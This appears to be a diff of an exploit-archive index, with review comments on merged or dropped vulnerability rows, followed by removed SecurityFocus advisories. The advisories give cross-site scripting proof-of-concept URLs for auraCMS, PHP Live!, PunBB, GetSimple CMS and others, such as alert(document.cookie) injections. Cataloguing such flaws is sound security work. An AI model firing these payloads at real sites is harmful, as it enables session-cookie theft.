27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php' rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php' rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0
27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 - diapo.php rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 - diapo.php rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0
@ -30293,9 +30289,6 @@ id,file,description,date,author,platform,type,port
29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0 29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0
29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 - shownews.php Cross-Site Scripting",2006-12-24,CorryL,php,webapps,0 29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 - shownews.php Cross-Site Scripting",2006-12-24,CorryL,php,webapps,0
29338,platforms/php/webapps/29338.txt,"vBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps,0 29338,platforms/php/webapps/29338.txt,"vBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps,0
29339,platforms/php/webapps/29339.txt,"PHP Live! 3.2.2 - setup/transcripts.php search_string Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0 29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
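Review bot: Rows 29339, 29340 and 29341 are removed together, and each named a different PHP Live! 3.2.2 script or parameter (setup/transcripts.php search_string, index.php l, message_box.php). If they were folded into one entry, that entry's description should still list the three affected scripts, and the commit message should say which ID survives; the hunk shows neither.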
@ -31429,8 +31422,6 @@ id,file,description,date,author,platform,type,port
31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0 31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0
31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - Reflected Cross-Site Scripting / Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0 31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - Reflected Cross-Site Scripting / Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0
31147,platforms/php/webapps/31147.txt,"Adult WebMaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0 31147,platforms/php/webapps/31147.txt,"Adult WebMaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0
31152,platforms/php/webapps/31152.txt,"artmedic weblog - artmedic_print.php date Parameter Cross-Site Scripting",2008-02-12,muuratsalo,php,webapps,0
31153,platforms/php/webapps/31153.txt,"artmedic weblog - 'index.php' jahrneu Parameter Cross-Site Scripting",2008-02-12,muuratsalo,php,webapps,0
31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0 31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0
31155,platforms/php/webapps/31155.txt,"Joomla! / Mambo Component 'com_iomezun' - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0 31155,platforms/php/webapps/31155.txt,"Joomla! / Mambo Component 'com_iomezun' - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
@ -32252,7 +32243,6 @@ id,file,description,date,author,platform,type,port
32342,platforms/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 - 'pick_users.php' SQL Injection",2008-09-08,"Omer Singer",php,webapps,0 32342,platforms/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 - 'pick_users.php' SQL Injection",2008-09-08,"Omer Singer",php,webapps,0
32346,platforms/php/webapps/32346.txt,"E-PHP B2B Trading Marketplace Script - 'listings.php' SQL Injection",2008-09-07,r45c4l,php,webapps,0 32346,platforms/php/webapps/32346.txt,"E-PHP B2B Trading Marketplace Script - 'listings.php' SQL Injection",2008-09-07,r45c4l,php,webapps,0
32347,platforms/php/webapps/32347.txt,"UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",php,webapps,0 32347,platforms/php/webapps/32347.txt,"UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",php,webapps,0
32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0
32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0 32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0
32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script - 'applynow.php' SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script - 'applynow.php' SQL Injection",2008-09-10,InjEctOr5,php,webapps,0
32353,platforms/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 32353,platforms/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0
@ -32896,7 +32886,7 @@ id,file,description,date,author,platform,type,port
33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 - 'failurl' Parameter HTTP Response Splitting",2010-01-21,Trancer,php,webapps,0 33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 - 'failurl' Parameter HTTP Response Splitting",2010-01-21,Trancer,php,webapps,0
33561,platforms/php/webapps/33561.txt,"OpenX 2.6.1 - SQL Injection",2010-01-22,AndySoon,php,webapps,0 33561,platforms/php/webapps/33561.txt,"OpenX 2.6.1 - SQL Injection",2010-01-22,AndySoon,php,webapps,0
33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0 33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0
33565,platforms/php/webapps/33565.txt,"PunBB 1.3 - 'viewtopic.php' Cross-Site Scripting",2010-01-24,s4r4d0,php,webapps,0 40752,platforms/php/webapps/40752.py,"InvoicePlane 1.4.8 - Password Reset",2016-11-11,feedersec,php,webapps,0
33566,platforms/php/webapps/33566.txt,"Joomla! Component 3D Cloud - 'tagcloud.swf' Cross-Site Scripting",2010-01-26,MustLive,php,webapps,0 33566,platforms/php/webapps/33566.txt,"Joomla! Component 3D Cloud - 'tagcloud.swf' Cross-Site Scripting",2010-01-26,MustLive,php,webapps,0
33586,platforms/php/webapps/33586.txt,"Joomla! Component com_gambling - 'gamblingEvent' Parameter SQL Injection",2010-02-01,md.r00t,php,webapps,0 33586,platforms/php/webapps/33586.txt,"Joomla! Component com_gambling - 'gamblingEvent' Parameter SQL Injection",2010-02-01,md.r00t,php,webapps,0
33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0
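Review bot: The new row 40752 ("InvoicePlane 1.4.8 - Password Reset", 2016-11-11) is written into the slot of the removed 33565, between 33564 and 33566, so one modified line hides both a deletion and an unrelated addition. Suggest deleting 33565 as its own change and placing 40752 with the other recent IDs, so the addition is visible as an addition and the 2010 block is not interrupted by a 2016 entry.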
@ -33317,7 +33307,6 @@ id,file,description,date,author,platform,type,port
34317,platforms/php/webapps/34317.txt,"WS Interactive Automne 4.0 - '228-recherche.php' Cross-Site Scripting",2009-12-13,loneferret,php,webapps,0 34317,platforms/php/webapps/34317.txt,"WS Interactive Automne 4.0 - '228-recherche.php' Cross-Site Scripting",2009-12-13,loneferret,php,webapps,0
34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 - Cross-Site Scripting / Authentication Bypass",2009-12-13,bi0,php,webapps,0 34318,platforms/php/webapps/34318.txt,"Zeecareers 2.0 - Cross-Site Scripting / Authentication Bypass",2009-12-13,bi0,php,webapps,0
34319,platforms/php/webapps/34319.txt,"Ez Cart - 'index.php' Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0 34319,platforms/php/webapps/34319.txt,"Ez Cart - 'index.php' Cross-Site Scripting",2009-12-14,anti-gov,php,webapps,0
34320,platforms/php/webapps/34320.txt,"Getsimple CMS 2.01 - admin/template/error_checking.php Multiple Parameter Cross-Site Scripting",2010-07-15,Leonard,php,webapps,0
34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",php,webapps,0 34321,platforms/php/webapps/34321.txt,"Spitfire 1.0.381 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-15,"Nijel the Destroyer",php,webapps,0
34322,platforms/php/webapps/34322.txt,"PHPWCMS 1.4.5 - 'PHPwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34322,platforms/php/webapps/34322.txt,"PHPWCMS 1.4.5 - 'PHPwcms.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0
@ -33635,7 +33624,7 @@ id,file,description,date,author,platform,type,port
34786,platforms/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0 34786,platforms/php/webapps/34786.txt,"eCardMAX - Multiple Cross-Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0
34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0 34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl - manager/index.php modahsh Parameter Cross-Site Scripting",2010-09-29,"John Leitch",php,webapps,0
34788,platforms/php/webapps/34788.txt,"MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0 34788,platforms/php/webapps/34788.txt,"MODx manager - /controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0
34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'admin/changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34789,platforms/php/webapps/34789.html,"Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting",2010-09-29,"High-Tech Bridge SA",php,webapps,0
34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0 34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 - 'cont1' Parameter HTML Injection",2010-09-29,"High-Tech Bridge SA",php,webapps,0
34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 34791,platforms/php/webapps/34791.txt,"Swinger Club Portal - start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
34792,platforms/php/webapps/34792.txt,"Swinger Club Portal - start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0 34792,platforms/php/webapps/34792.txt,"Swinger Club Portal - start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0
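Review bot: On 34789 the title changes from 'admin/changedata.php' to 'changedata.php', which loses the information that the affected script sits under admin/. Row 34787 in the same hunk keeps its directory ("manager/index.php"), so the shortened form is also inconsistent; suggest keeping the path and only normalising the quoting.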
@ -33982,7 +33971,7 @@ id,file,description,date,author,platform,type,port
35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0
35353,platforms/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'admin/upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 35353,platforms/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0
35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80
35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0
35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0
@ -34476,7 +34465,6 @@ id,file,description,date,author,platform,type,port
36166,platforms/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps,0 36166,platforms/php/webapps/36166.txt,"WordPress Plugin BuddyPress 1.2.10 / WordPress Theme DEV Blogs Mu 1.2.6 (WordPress 3.1.4) - Regular Subscriber HTML Injection",2011-09-26,knull,php,webapps,0
36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 - Cross-Site Scripting / Information Disclosure",2011-09-26,"Stefan Schurtz",php,webapps,0
36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0 36168,platforms/php/webapps/36168.txt,"S9Y Serendipity Freetag-plugin 3.23 - 'serendipity[tagview]' Cross-Site Scripting",2011-09-26,"Stefan Schurtz",php,webapps,0
36170,platforms/php/webapps/36170.txt,"PunBB 1.3.6 - 'browse.php' Cross-Site Scripting",2011-09-26,Amir,php,webapps,0
36171,platforms/php/webapps/36171.txt,"Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0 36171,platforms/php/webapps/36171.txt,"Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection",2011-09-26,"BHG Security Group",php,webapps,0
36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0
36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0 36173,platforms/php/webapps/36173.txt,"Vanira CMS - 'vtpidshow' Parameter SQL Injection",2011-09-27,"kurdish hackers team",php,webapps,0
@ -35153,10 +35141,6 @@ id,file,description,date,author,platform,type,port
37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80
37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80
37155,platforms/php/webapps/37155.txt,"WordPress Plugin WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 37155,platforms/php/webapps/37155.txt,"WordPress Plugin WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0
37156,platforms/php/webapps/37156.txt,"Getsimple CMS 3.1 - admin/theme.php err Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0
37157,platforms/php/webapps/37157.txt,"Getsimple CMS 3.1 - admin/pages.php error Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0
37158,platforms/php/webapps/37158.txt,"Getsimple CMS 3.1 - admin/index.php Multiple Parameter Reflected Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0
37159,platforms/php/webapps/37159.txt,"Getsimple CMS 3.1 - admin/upload.php path Parameter Cross-Site Scripting",2012-05-12,"Chokri Ben Achor",php,webapps,0
37161,platforms/php/webapps/37161.txt,"WordPress Plugin GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37161,platforms/php/webapps/37161.txt,"WordPress Plugin GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37162,platforms/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37162,platforms/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0
37166,platforms/php/webapps/37166.php,"WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload",2015-06-01,"nabil chris",php,webapps,0 37166,platforms/php/webapps/37166.php,"WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload",2015-06-01,"nabil chris",php,webapps,0
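Review bot: The four rows removed here (37156 to 37159) are the only Getsimple CMS 3.1 entries visible in this diff; the Getsimple rows that remain in the other hunks are titled 2.01 or 2.03. If these were merged into an existing entry, its title needs to cover 3.1 and the affected scripts (theme.php, pages.php, index.php, upload.php), otherwise the version information is lost from the index.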
@ -35911,8 +35895,6 @@ id,file,description,date,author,platform,type,port
38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injection",2015-10-19,LiquidWorm,php,webapps,0
38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0 38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0
38502,platforms/php/webapps/38502.txt,"Getsimple CMS - /admin/edit.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0
38503,platforms/php/webapps/38503.txt,"Getsimple CMS - /admin/filebrowser.php Multiple Parameter Cross-Site Scripting",2013-05-01,"High-Tech Bridge",php,webapps,0
38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - /zapiServlet CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - /zapiServlet CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0
38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0
38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0
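Review bot: The rows for 38502 and 38503 (both GetSimple CMS, 2013-05-01, High-Tech Bridge) are dropped in this hunk, and nothing in the hunk says which entry, if any, replaces them. Anyone who cites these ids in detection notes or patch records is left with a dangling reference. Suggest naming the surviving id for each removed row in the commit message, or keeping a redirect row in the index.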

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/12708/info
auraCMS is affected by multiple cross-site scripting vulnerabilities.
These issues exist because the application fails to properly sanitize user-supplied input.
Because of these vulnerabilities, an attacker may craft a link containing malicious HTML or script code and present the link to a victim. If the victim user follows the link, the attacker-supplied code will be executed in their browser in the security context of the vulnerable site.
http://www.example.com/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
http://www.example.com/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17184/info
PHP Live! is prone to a cross-site scripting vulnerability. This issue is due to a lack of proper sanitization of user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/phplive/js/status_image.php?base_url=<script>alert(document.cookie)</script>

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17960/info
PHP Live Helper is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/chat.php?action=showmain&PHPSESSID=XSS

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/21737/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Version 3.2.2 was reported vulnerable; other versions may also be affected.
/transcripts.php?action=view&deptid=1&userid=0&search_string=[XSS]

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/21737/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Version 3.2.2 was reported vulnerable; other versions may also be affected.
http://www.example.com/index.php?l=[XSS]

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/21737/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Version 3.2.2 was reported vulnerable; other versions may also be affected.
/phplive/message_box.php?theme=&l=ezpub&x=1&deptid=[XSS]
/phplive/message_box.php?theme=&l=admin&x=[XSS]

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/27745/info
artmedic webdesign weblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/artmedic_weblog/artmedic_print.php?date=<script>alert(1)</script>

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/27745/info
artmedic webdesign weblog is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/artmedic_weblog/index.php?jahrneu=<script>alert(1)</script>

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/31082/info
PunBB is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to PunBB 1.2.20 are vulnerable.
http://www.example.com/userlist.php?p=2<script>alert('meh');</script>

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/37930/info
PunBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PunBB 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/forum/viewtopic.php?pid=[Xss]

@ -1,25 +0,0 @@
source: http://www.securityfocus.com/bid/41697/info
GetSimple CMS is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, an HTML-injection vulnerability, and a directory-traversal vulnerability.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, to retrieve and possibly execute arbitrary files through the use of directory-traversal strings, to obtain potentially sensitive information, or to execute arbitrary local scripts in the context of the webserver process.
GetSimple CMS 2.01 is vulnerable; other versions may also be affected.
http://www.example.com/admin/template/error_checking.php?upd=bak-success&i18n[ER_BAKUP_DELETED]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ER_REQ_PROC_FAIL]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=bak-err&i18n[ERROR]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=edit&i18n[ER_YOUR_CHANGES]=[XSS]
